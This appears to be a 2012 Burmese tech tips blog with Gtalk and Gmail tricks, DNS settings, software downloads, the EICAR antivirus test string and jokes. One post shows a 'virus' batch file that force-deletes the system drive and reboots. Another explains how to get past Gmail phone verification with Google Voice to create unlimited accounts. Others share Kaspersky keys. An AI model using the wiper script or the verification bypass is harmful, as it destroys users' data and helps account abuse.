Wednesday, October 24, 2012

Gtalk ထဲမှာအလွယ်တကူ ရှာလို့ရမယ့်နည်း

Gtalk ထဲမှာတင် ဆိုဒ်များကို အလွယ်တကူ ရှာလို့ရမယ့်နည်းလေးပါ။ သင့် Gtalk ထဲမှာ

webtoim1@gmail.com ကိုသာ Add လိုက်ပါ။ online ဖြစ်လာပြီဆိုရင်တော့ကြိုက်သလိုရှာနိုင်ပါပြီ
ရှာနည်းကတော့ - google(space bar)texts
 အလွယ်တကူ အသုံးတည့်တဲ့လင့်ခ်တွေကို ခဏတွင်းချင်းရှာနိုင်ပါ
လိမ့်မယ်။ အဲဒီထဲမှာ အခြားသော ဆားဗစ်များလည်း ပါပါသေးတယ်။ စမ်းကြည့်နိုင်ပါတယ်။

Windows 7 တွင် Internet connection speed မြှင့်ကြရအောင်

DNS Server(Step3)

1.Start -----> Run တွင် ncpa.cplကိုရိုက်၍ Enter ခေါက်ပါ။

2.Local Area Connection ကို Right Click လုပ်၍ Popup Menu မှ Properties ကို နှိပ်ပါ။

3.Internet Protocol TCP/IP ရွေး၍ Properties ကို နှိပ်ပါ။

4.Preferred DNS Server တွင် 208.67.222.222 ကိုထည့်ပါ။

5.Alternate DNS Server တွင် 208.67.220.220 ကိုထည့်ပါ။

6.OK ကိုနှိပ်ပါ။ OK ကိုနှိပ်ပါ။



အဆင်ပြေပါစေ.....

Format Factory 2.90 ( Latest Version )



အားလုံးစောင့်မျှော်နေတဲ့ Format Factory 2.90 ပရိသတ်ကြီးရှေ့မှောက်ရောက်ရှိလို့လာပါပြီ။ တမ်းပလိတ်ပျက်တာ သိပ်မပြင်လိုက်ရလို့ကံကောင်းသွားတယ်မှတ်။ ယုတ်မာပတ်စက် စကောလောက်မှစောက်မနက်တဲ့ BTemplate လုပ်ပုံက ပုံတွေကို သူတို့ တင်ထားတဲ့ Hosting ကနေဖျက်ချပစ်တယ်လေ။ အဲ့တော့ ဒီမှာသေရော။ အကုန်လုံး Error Messages တွေတက်လာတယ်။ ကျွန်တော့်အရင် တမ်းပလိတ် Android လေးတုံးကလည်း Slider ပြေးတဲ့၊ Menu Bar အောက်ကကျတဲ့ကောင်လေးတွေလုပ်တဲ့ Java Stript File ကို ဖျက်ချပစ်တယ်လေ။ ဒီမှာ အကုန်လုံးကသေကုန်ရော။ ကဲပါ။ သူများကိုမေတ္တာတွေပို့နေတယ်။ စောစောစီးစီး မကောင်းတော့လည်းမကောင်းပါဘူး။ ကဲကဲ ဒီကောင်လေးကတော့ Format Factory 2.90 ပါ။ အောက်မှာဒေါင်းထားပါ။ Zip File ပါ။ ဒေါင်းဖို့ Hosting သုံးခုကနေတင်ပေးထားပါတယ်။ ဒေါင်းပြီးတော့ Zip File ကိုဖြေချလိုက်။ အောက်မှပေးထားတဲ့အတိုင်း Install လုပ်ဖို့မေးလာလိမ့်မယ်။ အဲဒီမှာ ကိုယ် Install လုပ်မယ့်နေရာလေးရွေးပေးလိုက်။ပြီးရင်တော့ Install ကိုနှိပ်လိုက်ပါ။
ပြီးရင် အောက်မှာပေးထားတဲ့အတိုင်း Install လုပ်လိမ့်မယ်။ ခဏစောင့်ပေးလိုက်။
ပြီးတာနဲ့ အောက်မှာပြထားတဲ့အတိုင်း Tool Bar တွေကိုပါ Install လုပ်ဖို့ပေးလာလိမ့်မယ်။ ဘာမှလုပ်မနေနဲ့။ အကုန်လုံး အမှန်ခြစ်တွေဖြူတ်ခဲ့လိုက်ပါ။ ပြီးရင်တော့ Next ပေါ့။

ပြီးရင်တော့ အောက်မှာပြထားတဲ့အတိုင်း Install လုပ်ပြီးကြောင်းအသိပေးပါလိမ့်မယ်။ ဘာအမှန်ခြစ်မှ မဖြုတ်ဘဲနဲ့ Finish နဲ့သာထွက်ခဲ့ပါ။

Download -- I File, Ziddu, Media Fire

VIRUS လေးရေးကြည့်ရအောင်

DESKTOP ပေါ်မှာ RIGHT CLICK ထောက်၊NEW ထဲက TEXT DOCUMENT ကိုရွေး။ အဲဒီ့ TEXT FILE ကိုဖွင့်ပြီး စာနဲနဲဝင်ရေးရအောင်။

@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00



ဒါလေးရေးပြီး SAVE လိုက်ပါ။ ပြီးရင် ဒီ TEXT FILE ကို CLICK ထောက် F2 ကိုနှိပ်ပြီး FILE NAME နဲ့ EXTENSION ကို VIRUS.BAT လို့ပြောင်းပေးလိုက်ပါမယ်။ ဒါဆို ဒီ FILE လေးက သိပ်ကြောက်စရာကောင်းတဲ့ ကောင်ဖြစ်သွားပြီ။ အခု အချိန်က စပြီး သူ့ကို DOUBLE CLICK တော့သွား မနှိပ်မိစေနဲ့( မ RUN မိစေနဲ့ )။ သင့် PRIMARY HARD DISK ထဲက DATA တွေအကုန်ပျက်သွားလိမ့်မယ်နော်..။တကယ်ပြောတာနော်။သိယုံလောက်ပါပဲ။

Free USB Disk Security 2012


ဒီကောင်လေးကတော့ Free USB Disk Security 2012 ပါ။ အောက်မှာဒေါင်းလိုက်ပါ။ ကိုယ်တိုင် Install လုပ်ကြည့်လိုက်ကြပါဦး။ မရရင်ပြောပါ။ ကျွန်တော်ပြန်ရှင်းပြပါ့မယ်။ ဒေါင်းဖို့ Hosting သုံးခုကနေတင်ပေးထားပါတယ်။ အဆင်ပြေတဲ့ Hosting ကနေဒေါင်းလိုက်ကြပါ။(သန့်သူရဘလော့ မှ ပြန်လည်မျှဝေလိုက်ပါတယ်)
Download -- Ifile, Media Fire, Ziddu

Gmail မှမဖတ်ရသေးသောစာများရှာနည်း

Gmail လေးဘက်ကိုလည့်ပြီး ပြသနာရှာကြည့်ရအောင် ခင်ဗျာ။ ဘယ်လိုလဲဆိုတော့ ကိုယ့်ရဲ့ GMAIL ကို ဖွင့်လိုက်တာနဲ့ မဖတ်ရသေးတဲ့ Mail တွေကို အပေါ်ဆုံးက ပေါ်နေရင် မကောင်ဘူးလားဗျာ။ ကိုယ်ကမေ့ပြီးတော့ မဖတ်ခဲ့ရင်လည်း အခုလို အပေါ်ဆုံးက ပေါ်နေတော့ အဆင်ပြေမယ် ထင်ပါတယ် ခင်ဗျာ။ ချစ်ချစ်ကမေးပို့ လိုက်လို့ ကိုယ်ကမသိဘူးဆိုရင်လည်း ပြန်ရှာနေစရာ မလိုဘူးပေါ့ဗျာ။ ဘယ်ကပဲ ပို့ ပို့ ပေါ့ဗျာ၊အရေးကြီးတာတွေကို ကိုယ်ကမဖတ်မိဘဲ ဖြစ်နေရင် မကောင်းဘူးပေါ့ဗျာ။ Gmail ကိုဖွင့်ပြီးရင် search box (အပေါ်ဆုံးမှာရှာပါ)ထဲမှာ label:unread in:inbox ဆိုတာကို ရိုက်ပြီးတော့ Search Mail ဆိုတာကို Click လိုက်ရင်မဖတ်ရသေးတဲ့ Mails လေးတွေကနေ စပြီးတော့ ဖော်ပြပေးပါလိမ့်မယ် ခင်ဗျာ။

Gmail ၀င်ရင် Verification Phone number တောင်းနေလို့လား?

Gmail Account အသစ် လုပ်ချင်ပါသလား ?( ကျော်ကိုကို၏ နည်းပညာမှပြန်လည်မျှဝေလိုက်ပါတယ်)
Gmail Account Disable ဖြစ်နေလို့လား ?
Gmail ၀င်ရင် Verification Phone number တောင်းနေလို့လား ?
လုံးဝ စိတ်ညစ်နေစရာမလိုပါ ။ အောက်မှာဖေါ်ပြထားသော နည်းအတိုင်းသာ လုပ်လိုက်ပါ ။ အားလုံး အဆင်ပြေသွားပါလိမ့်မည် ။

အရင်ဆုံး မြန်မာပြည်ကဆိုရင်  ဒါလေးအရင် ဒေါင်းယူထားလိုက်ပါ

Sept 1. ဒီနေရာလေး  ကနေ Sing In ၀င်လိုက်ပါ ။ Sing In ၀င်ပြီးသွားရင်

Step 2. Google Voice mail ထဲမှာ  Get a Voice number  (or) UPGRADE ကို နှိပ်ပါ။ ( Upgrade you account box )  ကျလာပါမည် ) ။

Step 3. I want a new number ကို နှိပ်ပါ ။ ( Choose your number box ကျလာပါမည် ) ။

Step 4. Word , phrase , number box မှာ 123456 ကို ထည့်ပြီး ၊ Search Numbers ကိုနှိပ်ပါ ။
Searching လုပ်ပါမည်။ ခဏစောင့်ပါ ။

Step 5. Result For 123456 ဆိုပီး ဖုန်း နံပါတ် ၅ ခု ပေါ်လာပါမည် ။ အဲထဲက တစ်ခုကိုမှတ်ထားလိုက်ပါ ။
ဥပမာ ။ ။ (234) (56) 34164 ၊ ပြီးရင် Continue ကို နှိပ်ပါ ။ Reserving number ဆိုတဲ့ စာတန်းလေး ပေါ်လာပါမည် ။ ခဏစောင့်ပါ ။ ပြီးရင် Creat new PIN box ကျလာပါမည် ။

Setp 6. Enter PIN နှင့် Confirm PIN မှာ ဂဏန်းလေးလုံးရိုက်ထည့်ပါ ။ ဥပမာ ။ ။ 4587 ပေါ့။ ( အတူတူဖြစ်ရပါမည် ) ။ ပြီးရင် I accept Google Voice’s Terms and Privacy Policy ကို ရွေးပါ ။ Continue ကိုနှိပ်ပါ ။ Creating account ဆိုတဲ့ စာတန်းလေးပေါ်လာပါမည် ။ ပြီးရင် Add a forwarding phone box လေးကျလာပါမည် ။ ခဏထား ထားလိုပ်ပါ ။

ဒီ Step တွေလုပ်နေချိန်မှာ တစ်ဖက်ကလဲ gmail account registrations လုပ်နေပါ ။ ဖုန်း နံပတ်တောင်းတဲ့ နေရာမှာ အခုန ကမှတ်ထားတဲ့ ဖုန်း နံပတ် (234 564 3416 ပေါ့) ကို ထည့်လိုက်ပီး Send Verification Code ကိုနှိပ်လိုက်ပါ ။ Country ကိုတော့ United State ရွေးထားရပါမည် ။ Verify Code တောင်းတဲ့နေရာကို ရောက်ရင် ၊ google voice ကိုပြန်သွားပီး add forwarding phone box ကို Cancel setup လုပ်လိုက်ပါ ။ canceling setup စာတန်းလေးပေါ်လာပါမည် ။ ပြီးရင် google voice ကိုလဲ loading ပြန်လုပ်ပါမည် ။ ခဏစောင့်ပါ ။ ပြီးရင် +14065454961 ဖုန်းနံပါတ်ကနေ Verification Code ပို့ပေးပါမည် ။
( +14065454961: You Google Verification Code is 989841 8:20 AM )
အဲဒီ Code ကို အခုနက Verification Code box မှာထည့်လိုပြီး Verify ကိုနှိပ်ပါ ။ ဒါဆို gmail account အသစ် တစ်ခုရသွားပါပြီး ။ ဒီနည်းအတိုင်း gmail account ကို ကြိုက်သလောက် လုပ်ယူလို့ရ ပါတယ် ။
( ဒါလေးတော့သိထားမှရပါမယ် ။ ။ Didn’t get your code? Sometimes it can take up to 15 minutes. If it’s been longer than that, try again.   15 မိနစ်ကျော်ရင် Gmail gmail Registrations က Expire ဖစ်သွားပါမည် ။ )
Gmail account မှမဟုတ်ပါ ။ Gmail Disable ဖြစ်ရင် ၊ Verification Phone number တောင်းရင် လဲ ဒီနည်းအတိုင်း လုပ်နိုင်ပါသည် ။ Verification phone number တောင်းတဲ့ နေရာတိုင်းမှာ ဒီနည်းအတိုင်း လုပ်ဆောင်နိုင်ပါသည် ။
မှတ်ချက်။ ။ google voice မရတဲ့ အင်တာနက်လိုင်နဲ့ဆို ကျော်ခွမှ ရပါမည် ။
( UltraSurf လိုမျိုးပေါ့ မရှိသေးရင် ဒီမှာဒေါင်းယူပါ  )

ဒါကတော့ Gtalk account lock ဖြစ်ရင် Unlock ပြန်ဖြေတဲ Link လေးပါ ။


လူသားများအားလုံး နှစ်တိုင်း ၊ လတိုင်း ၊ နေ့ ရက်တိုင်း ၊ နာရီတိုင်း ၊ မိနစ်တိုင်း၊ စက္ကန့်တိုင်း………ပျော်ရွင်မှုအပေါင်းနှင့် ခငြောင်းနိုင်ပါစေကြောင်း ။

Kaspersky Keys (21-5-2010)

Friday, May 21, 2010


၂၁-၅-၂၀၁၀ ကရရှိတဲ့ Kaspersky Keys အသစ်လေးတွေပါ။ Keys အလိုရှိနေသူများ ဒီမှာ ဒေါင်းကြပါခင်ဗျာ။







အောင်မြင်ပါစေ.....(စိတ်ကူးတည့်ရာမှ ပြန်လည်မျှဝေလိုက်ပါတယ်)

Windows 7 exe Error

Wednesday, December 29, 2010


Windows 7 တွင် ဆော့ဖ်ဝဲတင်လိုက်လို့ပဲဖြစ်ဖြစ်၊ update လုပ်လိုက်လို့ပဲဖြစ်ဖြစ် exe error ဖြစ်ပြီး ဆော့ဖ်ဝဲတွေ သုံးလို့မရတော့ဘဲ ဖြစ်တတ်ပါတယ်။ Start Menu မှာ ရှိတဲ့ Application အားလုံးရဲ့ Shortcut တွေဟာလည်း အလုပ်လုပ် မလုပ်တော့ပါဘူး။ ဖွင့်လိုက်တိုင်း Active ဖြစ်နေတဲ့ Application တစ်ခုသာ ပွင့်လာမှာ ဖြစ်ပါတယ်။ ဥပမာ firefox က active ဖြစ်နေတယ်ဆိုပါစို့ (ပုံတွင်ကြည့်ပါ)။ အဲဒီအချိန်မှာ ဘယ်ဟာကိုပဲ ဖွင့်ဖွင့် firefox ပဲ တက်လာမှာပါ။ firefox မှ မဟုတ်ပါဘူး တစ်ခြား ဆော့ဖ်ဝဲတစ်ခုခုလည်း active ဖြစ်ပြီး ကျန်နေတတ်ပါတယ်။ (vlc တို့၊ windows media center တို့ စသဖြင့်ပေါ့)။ အဲဒါကတော့ registry ထဲမှာရှိတဲ့ exe ရဲ့ entry တွေ ပျက်သွားလို့ပါပဲ။ အဲဒီလိုမျိုးဖြစ်တာနဲ့ ကြုံနေရတဲ့သူများအတွက် ပြေလည်အောင် အလွယ်တကူ ဖြေရှင်းပေးနိုင်မယ့် registry fix ဖိုင်လေးကို တင်ပေးလိုက်ပါတယ်။ လိုအပ်နေသူများအတွက် အသုံးတည့်မယ်လို့ ထင်ပါတယ်။


Download Mediafire
(စိတ်ကူးတည့်ရာနည်းပညာမှ ပြန်လည်မျှဝေလိုက်ပါတယ်)

Tuesday, October 23, 2012

Memory Card ထဲကဖျက်လိုက်မိတဲ့ Data , file တွေကို ပြန်ယူဖို့ နည်းလမ်း


ကွန်ပျူတာမှာ မမျှော်လင့်ဘဲ ဖျက်လိုက်မိလို့ ပျောက်ဆုံးသွားတဲ့ Data , file တွေကို ပြန်ယူဖို့ နည်းလမ်း မျှဝေပေးခဲ့ပြီး ဖြစ်ပါတယ်။ ဒီတစ်ခါ စာဖတ်သူတို့ အသုံးပြုနေတဲ့ memory card, micro SD ကဒ်၊ ကင်မရာသုံး SD ကဒ်များ အတွက် အချက်အလက်များ ပြန်ယူလို့ ရစေမယ့် ဆော့ဖ်ဝဲ ဖြစ်ပါတယ်။ သီချင်း၊ ရုပ်ရှင်၊ ဓာတ်ပုံ၊ Application အစရှိသဖြင့် recovery ပြန်လုပ်လို့ ရပါတယ်။

၂။ Instll လုပ်ရပါမယ်။

၃။ Recover files box ပေါ်လာပြီး next ကိုနှိပ်ပါ။

၎။ Recycle Bin မှာ ပြန်ရှာတွေ့သလားလို့ မေးပါလိ့မ့်မယ်။ No, I did not find ဆိုတာကို ရွေးရပါမယ်။

၅။ မိမိ recover ပြန်လုပ်လိုတဲ့ memory ကဒ် / Pen drive ကို ထိုးပြီး ရွေးချယ်ရပါမယ်။

၆။ Dee surface scan ကို ရွေးပြီး Next နှိပ်ရပါမယ်။

၇။ Star Deep surface scan ကို click နှိပ်ပေးရပါမယ်။

၈။ မိမိ delete လုပ်ထားမိသမျှ သီချင်း၊ ဓာတ်ပုံ၊ အချက်အလက်၊ Application တို့ ပေါ်လာပြီး ကိုယ်နှစ်သက်ရာ ပြန်လည်ရွေးချယ် recover လုပ်နိုင်ပြီ ဖြစ်ပါတယ်
------------------------
TechSpace နည်းပညာဂျာနယ်မှ ကူးယူ ဖော်ပြသည်။ http://techspacejournal.blogspot.com/2012/09/memory-card-sd-delete-data.html

Sunday, October 21, 2012

PC Tools Registry Mechanic 11.1.0.214 Silent

ကဲဒီတစ်ခါ Registry cleaner လေးတစ်ခုတင်ပေးလိုက်ပါတယ်။ အမျိုးမျိုးစမ်းသုံးချင်သူများအတွက်ပါ။ Cleaner တွေကပေါလိုက်တာမှ တအားပဲ။ အခုလည်းအသစ်တစ်ခုတွေ့လို့် ပါ။ ဒီကောင်လေးက ဘာကီးမှ မလိုပါဘူး။ ရိုးရိုးလေး install လုပ်ပြီးရင် သုံးလို့ရပါပြီ။  ကျွန်တော်နဲ့တော့ မကိုက်ဘူးဗျ။ ဘာလို့လည်းဆိုတော့ သူက အကုန်ရှင်းတာ ၊ အင်တာနက် Browser history တွေပါရှင်းတာ။ ကျွန်တော်က  History ချန်တာကို သဘောကျတယ်။ ဒီကောင်လေးက အကုန်ရှင်းထုတ်ပစ်တော့  Firefox ကို အသစ်တစ်ခု ပြန်ပြန် သုံးနေရသလိုဖြစ်နေတာ။ အသုံးလိုမည့်သူများအောက်မှာ ဒေါင်းလိုက်ပါ။ 
To download >> Mediafire 
အားလုံးကိုလေးစားလျက်.....

မိမိ ရဲ့ ကွန်ပျုတာ 3D Leaves နဲ့အလှဆင်ရအောင်

သူငယ်ချင်းတို့ရဲ့ကွန်ပျုတာ Screen ကို သစ်ရွက်လေးနဲ့ အလှဆင်ကြည့်ရအောင်နော် ဒါလေးကလည်းဒီဇိုင်းတမျိုးလေးပေါ့ ထက်ထက်အရင်တစ်ခါက တင်ပေးထားတာက Screen မှာအသဲပုံလေးနဲ့ ပန်းလေးတွေနော် မှတ်မိတယ်မလား အခုက သစ်ရွက်လေးတွေပါ
စိတ်ဝင်စားတယ်ဆိုရင် စမ်းသပ်ကြည့်နော် ဒီဇိုင်းတမျိုးလေးနဲ့အရမ်းလှတာ ထက်ထက်စမ်းသပ်ပြီးပြီ
လုပ်ပုံလုပ်နည်းကို အောက်မှာပုံလေးနဲ့ရှင်းပြထားပါတယ်


Download 1
Download 2
ဒေါင်းပြီးတာလို့ Install လုပ်ပြီးတာနဲ့ မိမိရဲ့ ကွန်ပျုတာ Screen မှာ သစ်ရွက်လေးတွေ အများကြီး ကိုတွေ့ရပါလိမ့်မယ် ပြီးရင် ဘောက်စ်တခုထွက်လာပါလိမ့်မယ် အောက်ကပုံလေးကိုကြည့်လိုက်ပါ

3D Leaves ဆိုတဲ့ဘောက်စ်လေးမှာ သစ်ရွက်လေးတွေကို အနည်းအများ ဒါမှမဟုတ် သစ်ရွက်လေးတွေအများကြီးထွက်လာအောင် ကိုယ်ကြိုက်သလောက် ချိန်လို့ရပါတယ်
ကိုယ်ကြိုက်သလောက်ချိန်ပြီးပြီဆိုရင်ဘောက်စ်လေးကိုပိတ်လိုက်တာနဲ့နောက်ထပ်ဘောက်စ်တခု ထွက်လာပါလိမ့်မယ်နော် အဲဒီမှာ OK ကိုနှိပ်လိုက်ပါ

PC Tools Registry Mechanic 11.1.0.214 Silent

ကဲဒီတစ်ခါ Registry cleaner လေးတစ်ခုတင်ပေးလိုက်ပါတယ်။ အမျိုးမျိုးစမ်းသုံးချင်သူများအတွက်ပါ။ Cleaner တွေကပေါလိုက်တာမှ တအားပဲ။ အခုလည်းအသစ်တစ်ခုတွေ့လို့် ပါ။ ဒီကောင်လေးက ဘာကီးမှ မလိုပါဘူး။ ရိုးရိုးလေး install လုပ်ပြီးရင် သုံးလို့ရပါပြီ။  ကျွန်တော်နဲ့တော့ မကိုက်ဘူးဗျ။ ဘာလို့လည်းဆိုတော့ သူက အကုန်ရှင်းတာ ၊ အင်တာနက် Browser history တွေပါရှင်းတာ။ ကျွန်တော်က  History ချန်တာကို သဘောကျတယ်။ ဒီကောင်လေးက အကုန်ရှင်းထုတ်ပစ်တော့  Firefox ကို အသစ်တစ်ခု ပြန်ပြန် သုံးနေရသလိုဖြစ်နေတာ။ အသုံးလိုမည့်သူများအောက်မှာ ဒေါင်းလိုက်ပါ။ 
To download >> Mediafire 
အားလုံးကိုလေးစားလျက်.....

Saturday, October 20, 2012

Galk မှာ ကိုယ့်ကို ဘယ်သူတွေ block လုပ်ထားသလဲ... စမ်းသပ်နည်း.

Galk မှာ ကိုယ့်ကို ဘယ်သူတွေ block လုပ်ထားသလဲ... စမ်းသပ်နည်း.
Gtalk မှာ ကိုယ် မ chat ချင်တဲ့/မကျေနပ်တဲ့ သူကို block လုပ်လို့ရတယ်ဆိုတာ အားလုံးသိပြီးသား ဖြစ်မှာပါ။
ကိုယ် block လုပ်ချင်တဲ့သူရဲ့ ID ပေါ်မှာ right-click လုပ်ပြီး block ကို ရွေးလိုက်ရုံပါပဲ။
ကိုယ့်ဘက်မှာ အဲဒီID ပျောက်သွားပြီး၊ သူ့ဘက်မှာတော့ ကိုယ်က offline ဖြစ်နေမှာပါ(သူများကိုသာ block လုပ်ချင်တာ...ကိုယ့်ကို block လုပ်တာကိုတော့ သိပ်ကျေနပ်တာမဟုတ်ဘူး။ ဟုတ်တယ်မဟုတ်လား..။ )
အဲဒီတော့ ကိုယ့်ကို block လုပ်ထား/မထားကို စစ်ကြည့်လို့ရပါတယ်။
ပထမဆုံး ကိုယ်သိချင်တဲ့သူကို ရွေးပါ..ပြီး.. 'Send voicemail' button ကိုနှိပ်ပြီး call လုပ်လိုက်ပါ။
(သူ့ကို offline အနေနဲ့ပဲမြင်ရမှာမို့ အဲဒီအချိန်မှာ 'Send voicemail' button ပဲပေါ်နေမှာပါ။)
မိန်းကလေးသံနဲ့ 'The person you are trying to reach is unavailable. Please leave a message...' ဆိုတဲ့ အသံမျိုး ကြားရရင်တော့ ကိုယ့်ကို block လုပ်မထားပါဘူး။
တကယ့်ကို offline ဖြစ်နေတာပါ။
အဲလိုမဟုတ်ပဲ ခေါ်လိုက်တာနဲ့ကျ ကျသွားတယ်၊ ဘာသံမှလည်းမကြားရဘူးဆိုရင်တော့...
စိတ်မကောင်းပါဘူး...သင့်ကို block လုပ်ထားတာပါ...
ကဲ...ကိုယ့်ကို ဘယ်သူတွေ block လုပ်ထားသလဲသိချင်ရင် စမ်းကြည့်လိုက်ပါလား...။
သိလာပါလိမ့်မယ်....။

motherboad driver ခွေပျောက်နေသူအတွက်

   mrwinkyawaung4 လည်း အိမ်က စက်အဟောင်း တစ်လုံး ကို အစွဲအလမ်း ကြီးတယ် ပြောရမလာ မစွန့် ပစ် နိုင်တာ နဲ့ ဘဲ all driver ပါတဲ့ xp ဘဲတင်နေရတယ် window 7 ပြန်တော့ မားသာဘုတ်က အသံမထွက်ဘူးလေ ဒီလိုနဲ လိုက်ကလိ ရင် စိတ်နာနာ နဲ window 8 ကိုတင်လိုက်တယ် အသံမလာ ပြန် ဘုတ်က တော်တော် နိုမ့်နေပြီးလေ driver checker တို့ driver genius တို့ ထည့်ပြီးလုပ်ဒါ အဆင်မပြေဘူးလေ နောက်တော့ မှ ဒီလင့်ကနေ သွားပြီး  ဒေါင်းပြီးထည့်လိုက်မှ အဆင်ပြေသွားတယ်လေ ဒါကြောင့်  mrwinkyawaung4 ရဲ့ သူငယ်ချင်းများ ဒီလိုအခက် အခက်ကြုံ ခဲ့ စောစောလင့် ကနေသွားပြီး ကိုယ့်မားသာ ဘုတ်နာမည် ကို ရှာတဲ့ ဘောက်မှာ ရိုက်ထည့်ပြီး ရှာပြီးဒေါင်နိုင်ပါတယ်ဗျာ .......... free ပေးထားတယ်နော် :P
             (ဘုရားသုံးဆူမြို့မှ ပြန်လည်မျှဝေလိုက်ပါတယ်)

Antivirus software အလုပ်လုပ်/မလုပ် စစ်ကြည့်ချင်ရင်

ကျွန်တော်တို့ ရဲ့ ကွန်ပျူတာကို Virus တွေ ၀င်ေ၇ာက်နေခြင်းကနေပြီး
အကာအကွယ်ပေးနိုင်ဖို့အတွက် အမျိုးမျိုးသော Antivirus တွေကို အသုံးပြုနေကြပါတယ်။
ကျွန်တော်တို့ အသုံးပြုနေတဲ့ Antivirus လေးကတကယ်ေ၇ာအလုပ်လုပ်၇ဲ့လားဆိုတာ
သိချင်သူများအတွက် အခုပြောတဲ့နည်းလမ်းလေးအတိုင်း စမ်းသပ်ကြည့်လိုက်ပါ။
အဆင်ပြေသွားပါလိမ့်မယ်။
(1)
အောက်မှာပေးထားတဲ့ code လေးကို notepad ထဲသို့ ကူးထည့်ပြီး Destop ပေါ်တွင်
(မိမိနှစ်သက်ရာတစ်ခု့ ရေးပါ.bat.exe) ဖြင့် save လိုက်ပါ။
ဥပမာ = lin.bat.exe အဲလိုနာမည်ပေးပြီး save လိုက်ပါ။
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
(2)
တကယ်လို့ မိမိတို့ အသုံးပြုနေတဲ့ Antivirus လေးက အလုပ်လုပ်တယ် ဆိုရင်တော့
ဒီကောင်လေးကို save လိုက်တဲ့အချိန် မှာ
အဲ့ဒီဖိုင်လေးဟာ  Destop  ပေါ်မှာပေါ်နေမှာမဟုတ်ပဲ ပျောက်သွားပါလိမ့်မယ်။
(3)

ကျွန်တော်တို့ သုံးနေတဲ့ Antivirus က အလုပ်မလုပ်ဘူးဆိုရင်တော့
အဲ့ဒီကောင်လေးကို save လိုက်တဲ့အချိန်မှာ .bat.exe ဆိုတဲ့အမည်နဲ့ ဖိုင်လေးတစ်ခုကို
Destop ပေါ်မှာ တွေရပါလိမ့်မယ်။
ဒါဆို၇င်တော့အခုသုံးနေတဲ့ Antivirus လေးကိုဖြုတ်ပြီး
နောက်ထပ်အသစ်တစ်ခုသာ ပြောင်းသုံးလိုက်ပါတော့..။
အားလုံးအဆင်ပြေကျပါစေခင်ဗျာ...

http://www.mmcfamily.org မှ

Friday, October 19, 2012

ပိုမူးအောင် လုပ်နေလို့

အရက်မူးနေသူ တစ်ယောက်က ဆိုင်ရှင်ကို ပြောလိုက်သည်။
“ ကျွန်တော် ခင်ဗျား ဆိုင်မှာ သောက်တာ ဒါ ပထမဦးဆုံး အကြိမ်ပဲ။ ဒါပေမယ့် မနက်ဖြန်က စပြီး မလာတော့ဘူးဗျာ ”
“ ကျွန်တော့် ဆိုင်က အရက်မကောင်းလို့လား၊ ဆက်ဆံရေး မကောင်းလို့လား ”
“ အာ....အရက်လည်း ကောင်းတယ်။ ဆက်ဆံရေးလည်း ကောင်းတယ်...ဒါပေမယ့်...... ”
“ ပြောပါဗျာ...အားမနာပါနဲ့ ”
“ စိတ်တော့ မရှိပါနဲ့ဗျာ၊ ခင်ဗျားဆိုင်မှာ ကပ်ထားတဲ့ အရက်ကြော်ငြာ မင်းသမီးတွေက ကျွန်တော့်ကို အရက်ပိုမူးအောင် လုပ်နေလို့ပါ ”

ဟာသ











ဒီအချိန်ရောက်လာရင်..

ဆေးခန်းတစ်ခုတွင် ဆရာဝန် ရောက်မလာသောကြောင့် လူနာအားလုံး လည်တဆန့်ဆန့် ဖြစ်နေကြသည်။ ထို့ကြောင့် သူနာပြု ဆရာမက အားပေးစကား ပြောလိုက်သည်။ “ အားနာလိုက်တာရှင်...ဒီနေ့မှ ဆရာက အစည်းအဝေးတစ်ခု မဖြစ်မနေတက်နေရလို့။ သည်းခံကြပါရှင်...ခဏနေ ရောက်တော့မှာပါ”
ထိုတွင် လူတစ်ယောက်က ထပြောလိုက်သည်။
“ ဆရာမ ကျေးဇူးပြုပြီး ကျွန့်တော့် နာမည်လေး ဖျက်လိုက်ပါတော့၊ ကျွန်တော် သွားစရာလေး ရှိနေသေးလို့ပါ ”
“ စောင့်လက်စနဲ့ ခဏလေး စောင့်လိုက်ပါ့လား။ ဒါနဲ့..ရှင်က ဘာရောဂါဖြစ်နေလို့လဲ ”
“ ကျွန်တော်က အရက်ဖြတ်မလို့ပါ။ ဒါပေမယ့် ဒီအချိန်က ကျွန်တော် သောက်နေကျ အချိန်လေ..နည်းနည်းတောင် နောက်ကျသွားပြီ ”
......... .....
( မှတ်ချက်။ ။ အချိန်နှင့် ဒီအရည်သည် လူကို မစောင့်ပါ )

ဟာသများ

တစ်ခါက တိုင်းပြည်တစ်ပြည်မှာ သန်းခေါင်ယံ ည၁၂နာရီတိတိမှာ ဖုန်းနံပါတ် သုည ၁၄လုံးကိုနှိပ်ရင် သေဆုံးသူတွေရဲ့ ဝိညာဉ်နဲ့ စကားပြောလို့ရတယ်ဆိုတဲ့ အယူတစ်ခုရှိခဲ့တယ်။တစ်ညမှာ အဲဒီအယူကို အယုံအကြည်မရှိတဲ့ လူငယ်တစ်ယောက်က စမ်းသပ်ကြည့်ဖို့ စိတ်ကူးလိုက်တယ်။ သိလိုစိတ်ပြင်းပြင်းပြပြနဲ့ လူငယ်ဟာ ညသန်းခေါင် ၁၂ နာရီတိတိမှာ သုည ၁၄လုံးကို ကောက်လှည့်လိုက်တယ်။ တကယ်ပဲ ဖုန်းတစ်ဖက်က မိန်းကလေးအသံ တစ်သံထွက်လာတယ်။ ဖုန်းတစ်ဖက်က ပြောလိုက်တာက

"လူကြီးမင်း ခေါ်ဆိုသော တယ်လီဖုန်းမှာ ဖုန်းနံပါတ် မှားယွင်းနေပါသဖြင့်....... "

၂)
တစ်ခါက ဥရောပဒေသတစ်ခုရဲ့ ညတစ်ညမှာ လူငယ်နှစ်ယောက်ဟာ ဟော်လိုဝင်း ပျော်ပွဲရွှင်ပွဲ
